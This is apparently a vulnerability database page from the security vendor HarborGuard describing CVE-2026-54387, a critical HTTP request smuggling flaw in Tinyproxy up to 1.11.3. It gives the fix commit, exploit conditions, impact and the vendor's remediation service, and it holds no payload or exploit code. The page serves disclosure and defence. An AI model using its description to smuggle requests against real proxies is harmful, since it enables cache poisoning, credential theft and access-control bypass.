HarborGuardharborguardDatabase
Back to search
CRITICALCVE-2026-54387Published Modified CNA VulnCheck

CVE-2026-54387: Tinyproxy - HTTP Request Smuggling via CL/TE Desynchronization

Tinyproxy through 1.11.3, fixed in commit ff45d3b, fails to reconcile conflicting Content-Length and Transfer-Encoding: chunked headers, forwarding both verbatim to the backend while using Content-Length to determine how many request body bytes to consume. Remote attackers can desynchronize the proxy and backend parser state, allowing injection of arbitrary HTTP requests to the backend to enable cache poisoning, access control bypass, and request hijacking.

Metrics

CVSS v4.0
9.3
Severity
CRITICAL
Fixed in
ff45d3bf0e61d0f8ed97ab379d3047f04eb67521
Affected Products
1

Get notified

Email me when this CVE is updated: new fix versions, severity changes, or any record change.

HarborGuard Analysis

Synopsis

HTTP request smuggling via CL/TE desynchronization in Tinyproxy affects versions through 1.11.3. The flaw is reachable over the network with no authentication required, as Tinyproxy forwards conflicting Content-Length and Transfer-Encoding: chunked headers verbatim to the backend while using only Content-Length to measure how many body bytes to consume. Successful exploitation lets a remote attacker inject arbitrary HTTP requests into the backend connection, enabling cache poisoning, access control bypass, and request hijacking. A patched-image rebuild pinned to commit ff45d3bf0e61d0f8ed97ab379d3047f04eb67521 is available on HarborGuard for environments running an affected version.

HarborGuard Coverage

Detection

Detection of CVE-2026-54387 is available across every HarborGuard environment; the CVE is ingested from upstream advisory feeds within minutes of publication and matched against all customer images in connected registries and CI pipelines, including custom-built images that bundle Tinyproxy. Coverage extends to any image layer that carries an affected version of the tinyproxy binary, regardless of base image.

Available
Triage

Triage is available with a CVSS v4.0 score of 9.3 (Critical) pre-populated, and per-environment compliance policy weighting can escalate or refine priority before the finding is routed to the appropriate team inbox inside each customer organization.

Available
Patch

A patched-image rebuild at commit ff45d3bf0e61d0f8ed97ab379d3047f04eb67521 is available on HarborGuard the moment the upstream fix is matched to an affected image. For customers who opt into auto-remediation, HarborGuard can trigger a rebuild, run a regression test suite against the new image, and open a pull request against affected workloads automatically.

Available

Exploit Conditions

  • Network reachabilityRequired

    The attacker must reach the Tinyproxy service over the network; no local or physical access is needed, and any internet-exposed or internally reachable proxy instance is in scope.

  • AuthenticationNot required

    No credentials or session token are required; the attacker sends a crafted HTTP request as an anonymous client.

  • Victim interactionNot required

    Exploitation is entirely server-side; no user needs to click a link, open a file, or take any action for the attack to succeed.

  • Attack complexityDetail

    The exploit is reliable and condition-free; no race condition, memory layout dependency, or special environment state is needed to trigger the header desynchronization.

Blast Radius

  • Reads any HTTP request body or header content transiting the proxy, including session tokens, credentials, and customer data forwarded to the backend.
  • Injects arbitrary requests into the backend connection, overwriting or poisoning cached responses and causing other users to receive attacker-controlled content.
  • Bypasses access controls enforced at the proxy layer by smuggling requests that the proxy never evaluates but the backend executes.
  • Hijacks in-flight requests from other clients sharing the same backend connection, allowing the attacker to capture or manipulate their responses.

How HarborGuard Handles This

Available on HarborGuard: detection for CVE-2026-54387 activates automatically for any image found carrying Tinyproxy 1.11.3 or earlier. A rebuild pinned to the upstream fix commit (ff45d3bf0e61d0f8ed97ab379d3047f04eb67521) is made available as soon as the affected image is identified. Where compliance policy permits auto-remediation, HarborGuard can rebuild the image, execute a regression test run, and open a pull request against affected workloads; for high and critical severity issues, the median time from CVE publication to a merged patch PR is around 90 minutes in environments with auto-remediation enabled. For teams that prefer a manual review gate, the finding is routed to the configured team inbox with full CVSS context and a direct reference to the fix commit. Until a rebuild is deployed, consider isolating Tinyproxy instances behind a network policy that restricts which clients can send requests, and review whether backend services can independently validate or reject ambiguous transfer-encoding headers as a compensating control.

See how HarborGuard automates this

Fix available

ff45d3bf0e61d0f8ed97ab379d3047f04eb67521
Patch commits
Affected packages
  • tinyproxy / tinyproxy
    ≤ 1.11.3
    Fixed in ff45d3bf0e61d0f8ed97ab379d3047f04eb67521
CVSS Vector
CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:N/SC:N/SI:N/SA:N
References